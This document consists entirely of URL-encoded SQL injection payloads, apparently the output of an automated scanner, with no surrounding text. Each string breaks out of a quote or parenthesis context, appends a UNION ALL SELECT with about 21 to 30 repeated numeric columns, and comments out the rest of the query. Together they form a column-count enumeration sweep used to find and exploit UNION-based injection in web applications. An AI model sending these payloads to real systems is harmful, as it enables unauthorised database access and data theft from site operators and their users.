-5368%27%29%20UNION%20ALL%20SELECT%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575%2C%205575--%20 -9041%27%29%20UNION%20ALL%20SELECT%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277%2C%205277--%20 -7783%27%29%20UNION%20ALL%20SELECT%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039%2C%206039--%20 -1720%27%29%20UNION%20ALL%20SELECT%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016%2C%203016--%20 -6473%27%29%20UNION%20ALL%20SELECT%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078%2C%203078--%20 -8595%27%29%20UNION%20ALL%20SELECT%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985%2C%209985--%20 -1309%27%29%20UNION%20ALL%20SELECT%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518%2C%205518--%20 -5231%27%29%20UNION%20ALL%20SELECT%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406%2C%205406--%20 -1270%27%29%20UNION%20ALL%20SELECT%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487--%20 -7097%27%20UNION%20ALL%20SELECT%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456%2C%207456--%20 -3021%27%20UNION%20ALL%20SELECT%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882%2C%209882--%20 -7352%27%20UNION%20ALL%20SELECT%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455%2C%204455--%20 -1674%27%20UNION%20ALL%20SELECT%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516%2C%208516--%20 -8575%27%20UNION%20ALL%20SELECT%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797%2C%201797--%20 -9512%27%20UNION%20ALL%20SELECT%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569%2C%206569--%20 -8774%27%20UNION%20ALL%20SELECT%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213%2C%203213--%20 -6215%27%20UNION%20ALL%20SELECT%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227%2C%208227--%20 -8811%27%20UNION%20ALL%20SELECT%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219%2C%207219--%20 -4207%27%20UNION%20ALL%20SELECT%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848%2C%204848--%20 -2814%22%20UNION%20ALL%20SELECT%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548%2C%204548--%20 -7371%22%20UNION%20ALL%20SELECT%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452%2C%208452--%20 -7642%22%20UNION%20ALL%20SELECT%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515%2C%205515--%20 -8819%22%20UNION%20ALL%20SELECT%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307%2C%209307--%20 -4802%22%20UNION%20ALL%20SELECT%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442%2C%204442--%20 -1792%22%20UNION%20ALL%20SELECT%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838%2C%205838--%20 -6148%22%20UNION%20ALL%20SELECT%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966%2C%206966--%20 -4076%22%20UNION%20ALL%20SELECT%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548%2C%203548--%20 -8270%22%20UNION%20ALL%20SELECT%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675%2C%201675--%20 -8761%22%20UNION%20ALL%20SELECT%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720%2C%203720--%20 -9510%29%20UNION%20ALL%20SELECT%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686%2C%205686--%20%20AND%20%283255%3D3255 -4612%29%20UNION%20ALL%20SELECT%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116%2C%207116--%20%20AND%20%289566%3D9566 -7627%29%20UNION%20ALL%20SELECT%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260--%20%20AND%20%287303%3D7303 -9273%29%20UNION%20ALL%20SELECT%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196--%20%20AND%20%286747%3D6747 -9456%29%20UNION%20ALL%20SELECT%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160%2C%202160--%20%20AND%20%281794%3D1794 -6959%29%20UNION%20ALL%20SELECT%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331%2C%202331--%20%20AND%20%285744%3D5744 -1866%29%20UNION%20ALL%20SELECT%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317--%20%20AND%20%282763%3D2763 -3562%29%20UNION%20ALL%20SELECT%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648%2C%205648--%20%20AND%20%284051%3D4051 -8959%29%20UNION%20ALL%20SELECT%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662--%20%20AND%20%285836%3D5836 -2344%29%20UNION%20ALL%20SELECT%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377%2C%202377--%20%20AND%20%286352%3D6352 -5557%29%29%20UNION%20ALL%20SELECT%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007%2C%202007--%20%20AND%20%28%282125%3D2125 -9363%29%29%20UNION%20ALL%20SELECT%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573%2C%209573--%20%20AND%20%28%285672%3D5672 -2175%29%29%20UNION%20ALL%20SELECT%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269%2C%203269--%20%20AND%20%28%282701%3D2701 -9063%29%29%20UNION%20ALL%20SELECT%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417--%20%20AND%20%28%284451%3D4451 -7863%29%29%20UNION%20ALL%20SELECT%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568%2C%202568--%20%20AND%20%28%285476%3D5476 -3172%29%29%20UNION%20ALL%20SELECT%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318%2C%209318--%20%20AND%20%28%287452%3D7452 -6230%29%29%20UNION%20ALL%20SELECT%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034--%20%20AND%20%28%285843%3D5843 -6381%29%29%20UNION%20ALL%20SELECT%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998--%20%20AND%20%28%287067%3D7067 -2342%29%29%20UNION%20ALL%20SELECT%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198%2C%205198--%20%20AND%20%28%283500%3D3500 -7473%29%29%20UNION%20ALL%20SELECT%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126%2C%209126--%20%20AND%20%28%287922%3D7922 -6326%29%29%29%20UNION%20ALL%20SELECT%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374%2C%205374--%20%20AND%20%28%28%287051%3D7051 -2321%29%29%29%20UNION%20ALL%20SELECT%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398%2C%204398--%20%20AND%20%28%28%286158%3D6158 -9202%29%29%29%20UNION%20ALL%20SELECT%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867%2C%209867--%20%20AND%20%28%28%287926%3D7926 -9969%29%29%29%20UNION%20ALL%20SELECT%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303%2C%206303--%20%20AND%20%28%28%285922%3D5922 -1712%29%29%29%20UNION%20ALL%20SELECT%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782%2C%207782--%20%20AND%20%28%28%289680%3D9680 -7311%29%29%29%20UNION%20ALL%20SELECT%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926%2C%202926--%20%20AND%20%28%28%289096%3D9096 -2151%29%29%29%20UNION%20ALL%20SELECT%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050%2C%203050--%20%20AND%20%28%28%287948%3D7948 -5882%29%29%29%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877--%20%20AND%20%28%28%283862%3D3862 -2556%29%29%29%20UNION%20ALL%20SELECT%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615%2C%204615--%20%20AND%20%28%28%288637%3D8637 -3023%29%29%29%20UNION%20ALL%20SELECT%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180--%20%20AND%20%28%28%287461%3D7461 -6737%20UNION%20ALL%20SELECT%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167%2C%202167--%20 -1449%20UNION%20ALL%20SELECT%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841%2C%204841--%20 -3906%20UNION%20ALL%20SELECT%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285%2C%209285--%20 -1792%20UNION%20ALL%20SELECT%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365%2C%205365--%20 -1212%20UNION%20ALL%20SELECT%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740--%20 -5859%20UNION%20ALL%20SELECT%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814--%20 -9370%20UNION%20ALL%20SELECT%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794--%20 -6340%20UNION%20ALL%20SELECT%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269%2C%202269--%20 -1679%20UNION%20ALL%20SELECT%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829--%20 -5459%20UNION%20ALL%20SELECT%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724%2C%208724--%20 -5943%27%29%20UNION%20ALL%20SELECT%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680--%20%20AND%20%28%27dSAp%27%3D%27dSAp -9422%27%29%20UNION%20ALL%20SELECT%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094%2C%205094--%20%20AND%20%28%27mlim%27%3D%27mlim -2080%27%29%20UNION%20ALL%20SELECT%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061%2C%209061--%20%20AND%20%28%27RUFy%27%3D%27RUFy -2059%27%29%20UNION%20ALL%20SELECT%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093%2C%203093--%20%20AND%20%28%27twcj%27%3D%27twcj -5345%27%29%20UNION%20ALL%20SELECT%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358%2C%208358--%20%20AND%20%28%27gNuP%27%3D%27gNuP -9151%27%29%20UNION%20ALL%20SELECT%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943--%20%20AND%20%28%27IufK%27%3D%27IufK -5278%27%29%20UNION%20ALL%20SELECT%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113%2C%206113--%20%20AND%20%28%27RQmR%27%3D%27RQmR -8117%27%29%20UNION%20ALL%20SELECT%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581%2C%201581--%20%20AND%20%28%27rOyI%27%3D%27rOyI -7570%27%29%20UNION%20ALL%20SELECT%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551%2C%202551--%20%20AND%20%28%27AjUG%27%3D%27AjUG -9921%27%29%20UNION%20ALL%20SELECT%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738%2C%208738--%20%20AND%20%28%27xPlI%27%3D%27xPlI -5955%27%29%29%20UNION%20ALL%20SELECT%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408%2C%203408--%20%20AND%20%28%28%27pRTz%27%3D%27pRTz 